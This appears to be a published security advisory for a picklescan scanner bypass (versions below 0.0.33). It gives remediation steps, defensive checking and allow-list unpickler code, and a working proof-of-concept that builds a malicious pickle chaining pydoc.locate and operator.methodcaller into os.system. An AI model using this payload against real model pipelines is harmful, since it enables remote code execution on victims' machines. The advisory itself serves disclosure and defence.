GHSA-84r2-jw7c-4r5q HIGH
Published December 29, 2025
CISO Take

If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.33 | 0.0.33 |

Do you use picklescan? You're affected.
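To check whether a deployed environment falls in the vulnerable range, the sketch below compares an installed version string against the patched release. The `is_vulnerable` helper and the assumption that picklescan versions are simple dotted integers are ours, not part of the advisory.

```python
# Patched release per the advisory.
PATCHED = (0, 0, 33)


def is_vulnerable(version: str) -> bool:
    """Return True if `version` is older than the patched 0.0.33 release.

    Assumes simple dotted-integer version strings, which matches
    picklescan's release history.
    """
    parts = tuple(int(p) for p in version.split("."))
    return parts < PATCHED


if __name__ == "__main__":
    # Check the locally installed copy, if any.
    try:
        from importlib.metadata import version as pkg_version
        installed = pkg_version("picklescan")
        print(installed, "VULNERABLE" if is_vulnerable(installed) else "patched")
    except Exception:
        print("picklescan is not installed")
```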

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. Upgrade picklescan to v0.0.33 immediately; this is the only complete fix.
  2. Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan.
  3. Implement defense-in-depth: load models in sandboxed or isolated environments (Docker, VM, restricted subprocess) regardless of scan results.
  4. Migrate to the SafeTensors format for model distribution, which eliminates pickle deserialization risk entirely.
  5. Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer.
  6. Detection in SIEM: alert on picklescan logs showing "Suspicious" results for the pydoc or operator modules; under prior versions these were under-flagged RCE payloads.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system
ISO 42001
A.6.2.6 - AI supply chain management
NIST AI RMF
MANAGE-2.2 - Mechanisms are in place and applied to sustain risk management controls
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Technical Details

NVD Description

### Summary

Currently picklescan only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to pass undetected and achieve RCE on the end user. In particular:

* `pydoc.locate`: can dynamically resolve and import arbitrary modules (e.g., resolving the string `"os"` to the actual `os` module).
* `operator.methodcaller`: allows executing a named method on an object. When combined with a resolved module object, it can execute functions like `system`.

Since `locate` and `methodcaller` are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check.

### PoC

Use the provided script to create a malicious pickle file:

```python
import pickle
import pydoc
import operator


class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name

    def __reduce__(self):
        return (pydoc.locate, (self.module_name,))


class RCEPayload:
    def __reduce__(self):
        cmd = "notepad"  # put your payload here
        mc = operator.methodcaller("system", cmd)
        return (mc, (ModuleLocator("os"),))


def generate_exploit():
    payload = RCEPayload()
    try:
        with open("bypass.pkl", "wb") as f:
            f.write(pickle.dumps(payload))
        print("File 'bypass.pkl' created.")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    generate_exploit()
```

The generated payload is not flagged as dangerous by picklescan but is actually malicious. The following script opens the pickle file, demonstrating the impact:

```python
import pickle

print("Loading bypass.pkl...")
pickle.load(open("bypass.pkl", "rb"))
```

### Remediation

The deny-list for these modules must be upgraded from specific functions to a wildcard (`*`), indicating that any use of these modules is dangerous.
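To see why the chain works without running the malicious PoC, the two primitives can be exercised with a harmless method in place of `system`. This is a stdlib-only illustration; the variable names are ours.

```python
import operator
import pydoc

# pydoc.locate resolves a dotted string to a live object, importing the
# module if needed; here the string "os" becomes the os module itself.
os_module = pydoc.locate("os")

# operator.methodcaller("name", *args) builds a callable that invokes
# obj.name(*args) on whatever object it receives.
call_getcwd = operator.methodcaller("getcwd")

# Chained exactly like the PoC, but with a harmless method instead of
# "system": this is equivalent to os.getcwd().
print(call_getcwd(os_module))
```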

Exploitation Scenario

Attacker targets an organization whose automated MLOps pipeline pulls pre-trained models from a public registry and scans them with picklescan before loading. The attacker publishes a malicious model to Hugging Face or injects one into an internal registry, embedding a pydoc.locate + operator.methodcaller payload that resolves os.system and executes a reverse shell. picklescan versions earlier than 0.0.33 rate the file as Safe. The CI/CD pipeline loads the model into the training cluster. The attacker now has RCE on GPU infrastructure, with access to proprietary model weights and training data and the ability to inject backdoors into production models before they are deployed.
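A pipeline in this position can also refuse dangerous globals at load time. The snippet below is a sketch of the allow-list `Unpickler` pattern described in the Python pickle documentation; the contents of `SAFE_GLOBALS` and the helper names are our illustrative choices, and a real deployment would allow only the types its models actually need.

```python
import io
import pickle

# Globals permitted during unpickling; everything else is refused.
# Illustrative set only: a real pipeline allow-lists its model's types.
SAFE_GLOBALS = {
    ("builtins", "complex"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: blocks pydoc, operator, os, and all else."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"blocked global {module}.{name} during unpickling"
        )


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads using the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers load fine because they reference no globals, while any payload that imports a callable, including the advisory's PoC chain, raises `UnpicklingError` instead of executing.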

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026